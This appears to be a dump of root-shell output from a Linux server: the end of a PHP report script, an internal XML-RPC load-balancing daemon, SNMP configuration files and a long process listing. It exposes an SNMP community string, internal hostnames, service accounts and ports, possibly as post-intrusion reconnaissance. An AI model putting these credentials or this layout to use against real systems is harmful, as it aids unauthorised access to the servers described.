<td align=right>".sprintf("%.01f",$info_array[total]/$info_array[servers]).
"</td>
<td align=right>".sprintf("%.01f",$info_array[total]/$count[$location])."</
td>
<td align=right>".sprintf("%.00f",($info_array[total]/$count[$location])/16
*100)."%</td>
<td align=right>$info_array[servers]</td>
<td align=right>$info_array[serverspace]</td>
</tr>";
}
$send .= "</tbody></table></p>$alldata</div><br /><br /><br /><br /><br /><b
r /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /></body
></html>";
file_put_contents("POWERPAGE.htm",$send);
?>
# cat /usr/local/sbin/gslb_rpc
#!/usr/bin/python
from SimpleXMLRPCServer import SimpleXMLRPCServer
from SimpleXMLRPCServer import SimpleXMLRPCRequestHandler
from SocketServer import ThreadingMixIn
from imageshack.server.SimpleAclServer import AclServerMixIn
from imageshack.server.LoggingXMLRPCServer import LoggingXMLRPCServer, Loggi
ngXMLRPCHandler
from imageshack.server import daemon, gslb_lib
from imageshack.utils import common
from optparse import OptionParser, OptionGroup
import logging, sys
SERVER_TYPE = 'replica'
GSLB_RPC_PORT = 1800
GSLB_ADDRESS = 'gslb'
RUN_AS = 'image'
TERM_WAIT = 10
ACCESS_LOG = '/dev/null'
ERROR_LOG = '/dev/null'
# Restrict to a particular path.
class GslbRequestHandler(SimpleXMLRPCRequestHandler): pass
class GslbXMLRPCServer(ThreadingMixIn, SimpleXMLRPCServer):
allow_reuse_address = True
# def start_server(backend_map, bind_address='localhost', bind_port=8080):
def main():
# Create server
server_type = SERVER_TYPE
daemonize = True
loglevel = logging.INFO
if options.debug:
loglevel = logging.DEBUG
daemonize = False
if daemonize:
daemon.daemonize()
backend_instance = gslb_lib.GSLB()
daemon.run_as(RUN_AS)
server = GslbXMLRPCServer((GSLB_ADDRESS, GSLB_RPC_PORT),
requestHandler=GslbRequestHandler)
# requestHandler=RequestHandler, allow_none=Tr
ue) # not compatible with all libraries
server.allow_reuse_address = True
server.register_instance(backend_instance)
# Run the server's main loop
server.serve_forever()
if __name__ == '__main__':
usage = "usage: %prog [options]"
option_parser = OptionParser(usage)
# option_parser.add_option('-t', '--server-type', type='string',
# dest='server_type', default='replica', help='sp
ecify master or replica')
# option_parser.add_option('-f', '--fork', action='store_true', dest='daem
onize', default=False,
# help='fork into background as daemon')
option_parser.add_option('-D', '--debug', action='store_true', dest='debug
', default=False,
help='log debug messages')
options, args = option_parser.parse_args()
main()
# /etc/*snmp*
total 24
drwxr-xr-x 75 root root 12288 Aug 26 13:22 ..
drwxr-xr-x 2 root root 4096 Aug 2 2009 .
lrwxrwxrwx 1 root root 38 Aug 2 2009 snmpd.conf -> /home/image/svn/con
fig/snmp/snmpd.conf
-rw-r--r-- 1 root root 109 Jul 18 2008 snmpd.conf_1249258945_Sun_Aug__2_
17_22_27_2009_.cfsaved
# ls -alt /home/image/svn/config/snmp/
total 24
drwxrwxrwx 50 image image 4096 May 24 17:44 ..
drwxrwxrwx 2 image image 4096 Mar 22 18:26 .
-rw-rw-r-- 1 image image 1020 Mar 22 18:26 snmpd.conf.gsthermos
-rw-rw-r-- 1 image image 1020 Mar 22 18:26 snmpd.conf.mtthermos
-rw-rw-r-- 1 image image 1020 Mar 22 18:26 snmpd.conf.rdthermos
-rw-rw-rw- 1 image image 109 Aug 5 2009 snmpd.conf
# cat /home/image/svn/config/snmp/snmpd.conf
# contact
syslocation Something
syscontact "root@someone.com"
# auth
rocommunity shacky
# disk monitoring
# cat /home/image/svn/config/snmp/snmpd.conf.gsthermos
# contact
syslocation Something
syscontact "root@someone.com"
# auth
rocommunity shacky
# ----------------------------------------------------------------------
#
# Extensions
#
# ----------------------------------------------------------------------
# https interface status on thermos boxes
#extend .1.3.6.1.4.1.2021.8.11 gsthermos-a /usr/bin/nc -z gsthermos-a 443
#extend .1.3.6.1.4.1.2021.8.11 mtthermos-a /usr/bin/nc -z mtthermos-a 443
#extend .1.3.6.1.4.1.2021.8.11 rdthermos-a /usr/bin/nc -z rdthermos-a 443
extend .1.3.6.1.4.1.2021.8.11 thermos-a /usr/bin/nc -z gsthermos-a 443
extend .1.3.6.1.4.1.2021.8.12 gsthermos0 /usr/bin/nc -z gsthermos0 443
extend .1.3.6.1.4.1.2021.8.13 mtthermos0 /usr/bin/nc -z mtthermos0 443
extend .1.3.6.1.4.1.2021.8.14 rdthermos0 /usr/bin/nc -z rdthermos0 443
extend .1.3.6.1.4.1.2021.8.15 gsthermos1 /usr/bin/nc -z gsthermos1 443
extend .1.3.6.1.4.1.2021.8.16 mtthermos1 /usr/bin/nc -z mtthermos1 443
extend .1.3.6.1.4.1.2021.8.17 rdthermos1 /usr/bin/nc -z rdthermos1 443
# ps auxwwf
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 7196 684 ? Ss Jun12 0:09 init [3]
root 2 0.0 0.0 0 0 ? S Jun12 0:20 [migration/
0]
root 3 0.0 0.0 0 0 ? SN Jun12 0:02 [ksoftirqd/
0]
root 4 0.0 0.0 0 0 ? S Jun12 0:00 [watchdog/0
]
root 5 0.0 0.0 0 0 ? S Jun12 0:12 [migration/
1]
root 6 0.0 0.0 0 0 ? SN Jun12 0:04 [ksoftirqd/
1]
root 7 0.0 0.0 0 0 ? S Jun12 0:00 [watchdog/1
]
root 8 0.0 0.0 0 0 ? S< Jun12 0:00 [events/0]
root 9 0.0 0.0 0 0 ? S< Jun12 0:00 [events/1]
root 10 0.0 0.0 0 0 ? S< Jun12 0:00 [khelper]
root 11 0.0 0.0 0 0 ? S< Jun12 0:00 [kthread]
root 57 0.0 0.0 0 0 ? S< Jun12 0:06 \_ [kblock
d/0]
root 58 0.0 0.0 0 0 ? S< Jun12 0:18 \_ [kblock
d/1]
root 59 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [kacpid
]
root 194 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [cqueue
/0]
root 195 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [cqueue
/1]
root 196 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [ksuspe
nd_usbd]
root 199 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [khubd]
root 201 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [kserio
d]
root 239 0.0 0.0 0 0 ? S Jun12 0:00 \_ [pdflus
h]
root 240 0.0 0.0 0 0 ? S Jun12 6:40 \_ [pdflus
h]
root 241 0.0 0.0 0 0 ? S< Jun12 0:34 \_ [kswapd
0]
root 242 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [aio/0]
root 243 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [aio/1]
root 389 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [kpsmou
sed]
root 414 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [ata/0]
root 415 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [ata/1]
root 416 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [ata_au
x]
root 423 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [scsi_e
h_0]
root 424 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [scsi_e
h_1]
root 438 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [scsi_e
h_2]
root 439 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [scsi_e
h_3]
root 452 0.0 0.0 0 0 ? S< Jun12 58:17 \_ [kjourn
ald]
root 490 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [kaudit
d]
root 800 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [kedac]
root 1041 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [khpsbp
kt]
root 1153 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [knodem
grd_0]
root 1339 0.0 0.0 0 0 ? S< Jun12 0:00 \_ [kmirro
rd]
root 1359 0.0 0.0 0 0 ? S< Jun12 0:07 \_ [kjourn
ald]
root 514 0.0 0.0 8428 720 ? S<s Jun12 0:00 /sbin/udevd
-d
root 1468 0.0 0.0 2704 292 ? Ss Jun12 56:51 cpuspeed -d
-n
root 1469 0.0 0.0 2704 292 ? S Jun12 56:14 \_ cpuspee
d -d -n
root 1643 0.0 0.0 3796 596 ? Ss Jun12 1:09 syslogd -m
0
root 1646 0.0 0.0 2716 396 ? Ss Jun12 0:00 klogd -x
root 1655 0.0 0.0 2712 284 ? Ss Jun12 3:40 irqbalance
named 1666 74.8 0.2 74872 14292 ? Ssl Jun12 84774:30 /usr/sbin
/named -u named
rpc 1695 0.0 0.0 4912 572 ? Ss Jun12 0:00 portmap
dbus 1730 0.0 0.0 14396 920 ? Ss Jun12 0:00 dbus-daemon
--system
root 1834 0.0 0.0 10164 756 ? Ss Jun12 0:35 /usr/sbin/a
utomount --timeout=60 /net program /etc/auto.net
nscd 1847 0.0 0.0 211104 1268 ? Ssl Jun12 30:34 /usr/sbin/n
scd
root 1862 0.0 0.0 3040 520 ? S Jun12 0:02 /usr/sbin/s
martd -q never
root 1870 0.0 0.0 2712 476 ? Ss Jun12 0:00 /usr/sbin/a
cpid
root 1879 0.0 0.0 110236 6652 ? S Jun12 26:11 /usr/sbin/s
nmpd -s -l /dev/null -P /var/run/snmpd -a
root 1890 0.0 0.0 24824 1252 ? Ss Jun12 0:00 /usr/sbin/s
shd
root 3777 0.0 0.0 39352 2712 ? Ss Jun12 0:00 \_ sshd: e
dwin [priv]
edwin 3789 0.0 0.0 39484 2100 ? S Jun12 0:10 \_ ssh
d: edwin@pts/0
edwin 3790 0.0 0.0 58972 1456 pts/0 Ss Jun12 0:00 \_
-bash
edwin 3964 0.0 0.0 64308 956 pts/0 S+ Jun12 0:02
\_ screen -x master
root 1899 0.0 0.0 9080 844 ? Ss Jun12 0:00 xinetd -sta
yalive -pidfile /var/run/xinetd.pid
gmond 1909 0.0 0.1 127196 8792 ? Ssl Jun12 56:12 /usr/sbin/g
mond
root 1926 0.0 0.0 34880 2556 ? Ss Jun12 0:30 sendmail: a
ccepting connections
smmsp 1938 0.0 0.0 28644 2000 ? Ss Jun12 0:00 sendmail: Q
ueue runner@01:00:00 for /var/spool/clientmqueue
root 1947 0.0 0.0 4332 356 ? Ss Jun12 0:00 gpm -m /dev
/input/mice -t exps2
root 1964 0.0 0.0 64624 1032 ? Ss Jun12 0:48 crond
root 15042 0.0 0.0 78704 1420 ? S Jun30 0:00 \_ crond
root 15053 0.0 0.0 5552 952 ? Ss Jun30 0:00 | \_ sh
/home/image/control_dns.sh
root 15390 0.0 0.0 40228 6428 ? S Jun30 0:00 | \_
/root/php -q /home/image/curlchecker.php
root 5213 0.0 0.0 78704 1416 ? S Aug15 0:00 \_ crond
root 5214 0.0 0.0 5552 956 ? Ss Aug15 0:00 | \_ sh
/home/image/control_dns.sh
root 5559 0.0 0.0 40268 6512 ? S Aug15 0:00 | \_
/root/php -q /home/image/curlchecker.php
root 22284 0.0 0.0 78704 1420 ? S Aug20 0:00 \_ crond
root 22289 0.0 0.0 5556 952 ? Ss Aug20 0:00 \_ sh
/home/image/control_dns.sh
root 22633 0.0 0.0 41280 6492 ? S Aug20 0:00 \_
/root/php -q /home/image/curlchecker.php
68 2120 0.0 0.0 15056 2980 ? Ss Jun12 0:14 hald
root 2121 0.0 0.0 10376 1020 ? S Jun12 0:00 \_ hald-ru
nner
68 2127 0.0 0.0 7788 796 ? S Jun12 0:00 \_ /us
r/libexec/hald-addon-acpi
68 2131 0.0 0.0 7788 780 ? S Jun12 0:00 \_ /us
r/libexec/hald-addon-keyboard
image 2168 0.0 0.1 135328 10596 ? S Jun12 11:18 /usr/bin/py
thon /usr/local/sbin/gslb_rpc
root 2202 0.0 0.0 2700 432 tty1 Ss+ Jun12 0:00 /sbin/minge
tty tty1
root 2203 0.0 0.0 2700 432 tty2 Ss+ Jun12 0:00 /sbin/minge
tty tty2
root 2204 0.0 0.0 2704 436 tty3 Ss+ Jun12 0:00 /sbin/minge
tty tty3
root 2205 0.0 0.0 2700 432 tty4 Ss+ Jun12 0:00 /sbin/minge
tty tty4
root 2206 0.0 0.0 2700 432 tty5 Ss+ Jun12 0:00 /sbin/minge
tty tty5
root 2207 0.0 0.0 2700 432 tty6 Ss+ Jun12 0:00 /sbin/minge
tty tty6
edwin 3942 0.0 0.0 68024 4780 ? Ss Jun12 0:08 SCREEN -S m
aster
edwin 3943 0.0 0.0 60016 2076 pts/1 Ss+ Jun12 0:00 \_ -csh
edwin 3968 0.0 0.0 60024 2084 pts/2 Ss Jun12 0:00 \_ -csh
root 7114 0.0 0.0 77544 1212 pts/2 S Jun12 0:00 | \_ su
-
root 7115 0.0 0.0 58972 1520 pts/2 S+ Jun12 0:00 | \_
-bash
edwin 9778 0.0 0.0 59780 1820 pts/4 Ss Jun12 0:00 \_ -csh
root 9797 0.0 0.0 66984 2632 pts/4 S+ Jun12 0:00 | \_ mys
ql -u root -px xxxxxxxx snmp
edwin 29321 0.0 0.0 59776 1820 pts/5 Ss Jul04 0:00 \_ -csh
root 13739 0.0 0.0 66976 2612 pts/5 S+ Aug09 0:00 \_ mys
ql -u root -px xxxxxxxx snmp
mysql 9705 9.7 7.6 4750232 537076 ? Sl Jun12 11045:03 /usr/sbin
/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
root 9846 0.0 0.0 13388 832 ? Ss Jun12 0:00 nginx: mast
er process /usr/sbin/nginx -c /etc/nginx-dbs/nginx.conf
apache 9847 0.0 0.0 15048 2980 ? S Jun12 76:36 \_ nginx:
worker process
apache 9848 0.0 0.0 15048 2980 ? S Jun12 77:56 \_ nginx:
worker process
apache 9849 0.0 0.0 15048 2980 ? S Jun12 76:56 \_ nginx:
worker process
apache 9850 0.0 0.0 15048 2980 ? S Jun12 78:08 \_ nginx:
worker process
apache 9851 0.0 0.0 15048 2980 ? S Jun12 76:38 \_ nginx:
worker process
apache 9852 0.0 0.0 15048 2980 ? S Jun12 76:31 \_ nginx:
worker process
apache 9854 0.0 0.0 15048 2980 ? S Jun12 76:44 \_ nginx:
worker process
apache 9855 0.0 0.0 15048 2980 ? S Jun12 77:12 \_ nginx:
worker process
image 20487 0.5 0.0 97248 6308 ? S Jun13 631:46 python /usr
/local/sbin/rolesd
root 28724 0.0 0.0 58844 1268 ? S Jun13 73:56 /bin/sh /us
r/local/sbin/edgar.sh --background
root 16023 0.0 0.0 55748 464 ? S 09:54 0:00 \_ sleep 1
0
apache 28792 0.0 0.0 39924 5472 ? Ss Jun13 1:28 /usr/local/
bin/php-cgi -d upload_tmp_dir=/tmp
apache 4593 0.0 0.0 40056 4988 ? S 05:28 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 5656 0.0 0.0 40068 4988 ? S 05:31 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 6078 0.0 0.0 40056 4992 ? S 05:31 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 6191 0.0 0.0 40072 4992 ? S 05:33 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 6640 0.0 0.0 40072 4992 ? S 05:35 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 6852 0.0 0.0 40056 4992 ? S 05:35 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 6853 0.0 0.0 40056 4992 ? S 05:35 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 7235 0.0 0.0 40056 4992 ? S 05:37 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 7259 0.0 0.0 40056 4988 ? S 05:38 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 7265 0.0 0.0 40072 4988 ? S 05:38 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 7297 0.0 0.0 40056 4988 ? S 05:38 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 8257 0.0 0.0 40056 4996 ? S 05:40 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 8789 0.0 0.0 40056 4988 ? S 05:41 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 8797 0.0 0.0 40056 4988 ? S 05:41 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 8816 0.0 0.0 40056 4988 ? S 05:42 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 8817 0.0 0.0 40072 4992 ? S 05:42 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 8892 0.0 0.0 40068 4992 ? S 05:42 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 8896 0.0 0.0 40072 4992 ? S 05:42 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 8945 0.0 0.0 40056 4992 ? S 05:43 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 9627 0.0 0.0 40056 4992 ? S 05:45 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 9631 0.0 0.0 40068 4992 ? S 05:45 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 9638 0.0 0.0 40056 4988 ? S 05:45 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 9977 0.0 0.0 40056 4988 ? S 05:46 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 9991 0.0 0.0 40056 4988 ? S 05:46 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 10003 0.0 0.0 40056 4992 ? S 05:46 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 10013 0.0 0.0 40056 4988 ? S 05:47 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 10017 0.0 0.0 40056 4992 ? S 05:47 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 10037 0.0 0.0 40056 4992 ? S 05:47 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 11127 0.0 0.0 40056 4992 ? S 05:50 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 11562 0.0 0.0 40072 4988 ? S 05:51 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 11590 0.0 0.0 40056 4988 ? S 05:51 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 11633 0.0 0.0 40068 4988 ? S 05:52 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 11683 0.0 0.0 40056 4988 ? S 05:53 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 12350 0.0 0.0 40068 4992 ? S 05:55 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 12650 0.0 0.0 40072 4992 ? S 05:56 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 12668 0.0 0.0 40068 5036 ? S 05:56 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 12692 0.0 0.0 40056 4988 ? S 05:56 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 12722 0.0 0.0 40056 4992 ? S 05:57 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 12764 0.0 0.0 40056 4988 ? S 05:58 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 13823 0.0 0.0 40056 4988 ? S 06:00 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 13827 0.0 0.0 40068 4984 ? S 06:00 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 13968 0.0 0.0 40056 4996 ? S 06:00 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 14677 0.0 0.0 40056 4992 ? S 06:01 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 14722 0.0 0.0 40056 4992 ? S 06:01 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 14826 0.0 0.0 40056 4992 ? S 06:01 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 15097 0.0 0.0 40068 5040 ? S 06:02 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 15233 0.0 0.0 40056 4988 ? S 06:02 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 15256 0.0 0.0 40056 4988 ? S 06:03 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 15270 0.0 0.0 40056 4988 ? S 06:03 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 16260 0.0 0.0 40056 4992 ? S 06:06 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 16313 0.0 0.0 40072 5004 ? S 06:07 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 16373 0.0 0.0 40072 4992 ? S 06:08 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 17462 0.0 0.0 40072 4988 ? S 06:10 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 17867 0.0 0.0 40072 4988 ? S 06:11 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 17912 0.0 0.0 40072 4988 ? S 06:12 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 17936 0.0 0.0 40056 4992 ? S 06:12 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 18936 0.0 0.0 40072 4992 ? S 06:15 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 18989 0.0 0.0 40056 4992 ? S 06:17 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 19001 0.0 0.0 40068 4984 ? S 06:17 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 19014 0.0 0.0 40068 4988 ? S 06:17 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 19025 0.0 0.0 40068 4988 ? S 06:17 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 19061 0.0 0.0 40056 4992 ? S 06:18 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 20042 0.0 0.0 40072 4996 ? S 06:20 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 20093 0.0 0.0 40056 4988 ? S 06:20 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 20508 0.0 0.0 40056 4988 ? S 06:21 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 20584 0.0 0.0 40072 4988 ? S 06:21 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 20746 0.0 0.0 40056 4988 ? S 06:23 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 21760 0.0 0.0 40068 4984 ? S 06:27 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 21777 0.0 0.0 40056 4988 ? S 06:27 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 21788 0.0 0.0 40056 4988 ? S 06:27 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 21799 0.0 0.0 40056 4988 ? S 06:27 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 21831 0.0 0.0 40056 4992 ? S 06:28 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 21842 0.0 0.0 40068 4984 ? S 06:28 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 23318 0.0 0.0 40056 4996 ? S 06:31 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 23376 0.0 0.0 40068 4988 ? S 06:32 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 24092 0.0 0.0 40056 4992 ? S 06:35 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 24093 0.0 0.0 40056 4988 ? S 06:35 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 24456 0.0 0.0 40068 4984 ? S 06:37 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 24499 0.0 0.0 40056 4988 ? S 06:38 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 26027 0.0 0.0 40056 4988 ? S 06:41 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 26045 0.0 0.0 40056 4992 ? S 06:42 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 26126 0.0 0.0 40068 4984 ? S 06:42 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 26185 0.0 0.0 40056 4988 ? S 06:43 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 27242 0.0 0.0 40068 4988 ? S 06:47 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 28823 0.0 0.0 40056 4992 ? S 06:51 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 28876 0.0 0.0 40056 4988 ? S 06:52 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 29931 0.0 0.0 40056 4992 ? S 06:56 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 29983 0.0 0.0 40068 4984 ? S 06:57 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 32353 0.0 0.0 40072 4992 ? S 07:03 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 734 0.0 0.0 40056 4988 ? S 07:05 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 1051 0.0 0.0 40056 4992 ? S 07:06 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 1070 0.0 0.0 40056 4988 ? S 07:06 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 1075 0.0 0.0 40072 4988 ? S 07:06 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 1170 0.0 0.0 40068 4992 ? S 07:08 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 1194 0.0 0.0 40068 4984 ? S 07:08 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 2726 0.0 0.0 40056 4992 ? S 07:11 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 2779 0.0 0.0 40068 4984 ? S 07:12 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 3489 0.0 0.0 40056 4992 ? S 07:15 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 3827 0.0 0.0 40068 4980 ? S 07:16 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 3854 0.0 0.0 40056 4988 ? S 07:16 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 3857 0.0 0.0 40056 4988 ? S 07:17 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 3944 0.0 0.0 40056 4988 ? S 07:18 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 5456 0.0 0.0 40068 4984 ? S 07:21 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 6263 0.0 0.0 40072 4988 ? S 07:25 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 6572 0.0 0.0 40056 4992 ? S 07:26 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 6701 0.0 0.0 40068 4984 ? S 07:28 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 8036 0.0 0.0 40072 4988 ? S 07:30 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 8230 0.0 0.0 40068 4984 ? S 07:32 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 8259 0.0 0.0 40056 4988 ? S 07:32 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 9044 0.0 0.0 40068 4996 ? S 07:35 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
